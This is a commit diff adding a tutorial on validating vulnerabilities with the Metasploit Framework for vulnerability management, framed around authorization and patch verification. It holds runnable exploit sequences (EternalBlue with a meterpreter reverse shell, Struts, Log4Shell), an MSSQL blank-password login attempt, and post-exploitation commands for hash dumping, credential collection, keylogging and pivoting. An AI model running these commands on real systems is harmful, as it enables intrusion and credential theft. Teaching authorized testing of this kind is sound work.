mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-17 13:15:16 +03:00
Initial commit - 611 cybersecurity skills across all subdomains
This commit is contained in:
@@ -0,0 +1,190 @@
|
||||
---
|
||||
name: None
|
||||
description: The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules
|
||||
domain: cybersecurity
|
||||
subdomain: vulnerability-management
|
||||
tags: [vulnerability-management, cve, metasploit, exploitation, penetration-testing, risk]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Exploiting Vulnerabilities with Metasploit Framework
|
||||
|
||||
## Overview
|
||||
The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules. Within vulnerability management, Metasploit serves as a validation tool to confirm that identified vulnerabilities are actually exploitable, enabling risk-based prioritization and demonstrating real-world impact to stakeholders.
|
||||
|
||||
## Prerequisites
|
||||
- Metasploit Framework installed (Kali Linux or standalone)
|
||||
- PostgreSQL database for session/credential management
|
||||
- Written authorization and rules of engagement for testing
|
||||
- Isolated test environment or approved production testing window
|
||||
- Understanding of networking, protocols, and exploitation concepts
|
||||
|
||||
## Core Concepts
|
||||
|
||||
### Metasploit Architecture
|
||||
- **msfconsole**: Primary interactive command-line interface
|
||||
- **Exploits**: Modules that leverage vulnerabilities to gain access
|
||||
- **Payloads**: Code executed on the target after successful exploitation
|
||||
- **Auxiliary**: Scanning, fuzzing, and information gathering modules
|
||||
- **Post-Exploitation**: Modules for privilege escalation, persistence, pivoting
|
||||
- **Encoders**: Payload encoding to evade signature-based detection
|
||||
- **Nops**: No-operation generators for payload alignment
|
||||
|
||||
### Exploitation Workflow in Vulnerability Management
|
||||
Unlike offensive red teaming, vulnerability management uses Metasploit to:
|
||||
1. **Validate** scanner findings (confirm exploitability)
|
||||
2. **Demonstrate** risk to business stakeholders
|
||||
3. **Prioritize** remediation based on proven exploitation paths
|
||||
4. **Verify** patches by confirming exploits no longer succeed
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
### Step 1: Initialize Metasploit Environment
|
||||
```bash
|
||||
# Start PostgreSQL and initialize database
|
||||
sudo systemctl start postgresql
|
||||
sudo msfdb init
|
||||
|
||||
# Launch msfconsole
|
||||
msfconsole -q
|
||||
|
||||
# Verify database connection
|
||||
msf6> db_status
|
||||
msf6> workspace -a vuln_validation_2025
|
||||
|
||||
# Import vulnerability scan results
|
||||
msf6> db_import /path/to/nessus_scan.nessus
|
||||
msf6> hosts
|
||||
msf6> vulns
|
||||
```
|
||||
|
||||
### Step 2: Validate Specific Vulnerabilities
|
||||
```bash
|
||||
# Example: Validate MS17-010 (EternalBlue) from scan findings
|
||||
msf6> search type:exploit name:ms17_010
|
||||
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
||||
msf6> show options
|
||||
msf6> set RHOSTS 192.168.1.100
|
||||
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
msf6> set LHOST 192.168.1.50
|
||||
msf6> set LPORT 4444
|
||||
|
||||
# Use check command first (non-exploitative validation)
|
||||
msf6> check
|
||||
# [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
|
||||
|
||||
# Only exploit if check confirms vulnerability and authorized
|
||||
msf6> exploit
|
||||
|
||||
# Example: Validate Apache Struts RCE (CVE-2017-5638)
|
||||
msf6> use exploit/multi/http/struts2_content_type_ognl
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> set RPORT 8080
|
||||
msf6> set TARGETURI /showcase.action
|
||||
msf6> check
|
||||
|
||||
# Example: Validate Log4Shell (CVE-2021-44228)
|
||||
msf6> use exploit/multi/http/log4shell_header_injection
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> set HTTP_HEADER X-Api-Version
|
||||
msf6> check
|
||||
```
|
||||
|
||||
### Step 3: Auxiliary Scanning for Validation
|
||||
```bash
|
||||
# SMB vulnerability scanning
|
||||
msf6> use auxiliary/scanner/smb/smb_ms17_010
|
||||
msf6> set RHOSTS 192.168.1.0/24
|
||||
msf6> set THREADS 10
|
||||
msf6> run
|
||||
|
||||
# SSL/TLS vulnerability checks
|
||||
msf6> use auxiliary/scanner/ssl/openssl_heartbleed
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> run
|
||||
|
||||
# HTTP vulnerability validation
|
||||
msf6> use auxiliary/scanner/http/dir_listing
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> run
|
||||
|
||||
# Database authentication testing
|
||||
msf6> use auxiliary/scanner/mssql/mssql_login
|
||||
msf6> set RHOSTS db-server.corp.local
|
||||
msf6> set USERNAME sa
|
||||
msf6> set PASSWORD ""
|
||||
msf6> run
|
||||
```
|
||||
|
||||
### Step 4: Post-Exploitation Impact Assessment
|
||||
```bash
|
||||
# After successful exploitation, demonstrate impact
|
||||
meterpreter> getuid
|
||||
meterpreter> sysinfo
|
||||
meterpreter> hashdump
|
||||
meterpreter> run post/multi/gather/env
|
||||
meterpreter> run post/windows/gather/enum_patches
|
||||
meterpreter> run post/windows/gather/credentials/credential_collector
|
||||
|
||||
# Network pivoting demonstration
|
||||
meterpreter> run post/multi/manage/autoroute
|
||||
meterpreter> run auxiliary/server/socks_proxy
|
||||
|
||||
# Screenshot for evidence
|
||||
meterpreter> screenshot
|
||||
meterpreter> keyscan_start
|
||||
```
|
||||
|
||||
### Step 5: Document and Report Findings
|
||||
```bash
|
||||
# Export exploitation evidence
|
||||
msf6> vulns -o /tmp/validated_vulns.csv
|
||||
msf6> hosts -o /tmp/compromised_hosts.csv
|
||||
msf6> creds -o /tmp/captured_creds.csv
|
||||
msf6> loot -o /tmp/captured_loot.csv
|
||||
|
||||
# Generate report from database
|
||||
msf6> db_export -f xml /tmp/msf_report.xml
|
||||
```
|
||||
|
||||
### Step 6: Post-Patch Verification
|
||||
```bash
|
||||
# After remediation, verify exploit no longer works
|
||||
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
||||
msf6> set RHOSTS 192.168.1.100
|
||||
msf6> check
|
||||
# [-] 192.168.1.100:445 - Host does NOT appear vulnerable.
|
||||
# Patch verified successfully
|
||||
```
|
||||
|
||||
## Safety Controls
|
||||
1. **Always use `check` command** before `exploit` when available
|
||||
2. **Set AutoRunScript** for clean session management
|
||||
3. **Use EXITFUNC=thread** to prevent crashing target services
|
||||
4. **Limit payload capabilities** to minimum needed for validation
|
||||
5. **Document every action** for audit trail and evidence
|
||||
6. **Use workspace isolation** per engagement
|
||||
7. **Never run Metasploit against unauthorized targets**
|
||||
|
||||
## Best Practices
|
||||
1. Start with vulnerability check modules before exploitation
|
||||
2. Use Metasploit to validate top-priority scanner findings only
|
||||
3. Coordinate with system owners for testing windows
|
||||
4. Maintain detailed logs of all exploitation attempts
|
||||
5. Clean up all artifacts and sessions after testing
|
||||
6. Use results to create compelling risk narratives for stakeholders
|
||||
7. Integrate Metasploit validation into vulnerability management workflow
|
||||
|
||||
## Common Pitfalls
|
||||
- Exploiting without written authorization (legal liability)
|
||||
- Using exploitation on production systems without coordination
|
||||
- Not cleaning up Meterpreter sessions and artifacts
|
||||
- Confusing vulnerability validation with penetration testing scope
|
||||
- Using outdated Metasploit modules against patched systems
|
||||
- Failing to document exploitation evidence for remediation teams
|
||||
|
||||
## Related Skills
|
||||
- performing-red-team-validated-vulnerability-testing
|
||||
- scanning-infrastructure-with-nessus
|
||||
- performing-network-vulnerability-assessment
|
||||
Reference in New Issue
Block a user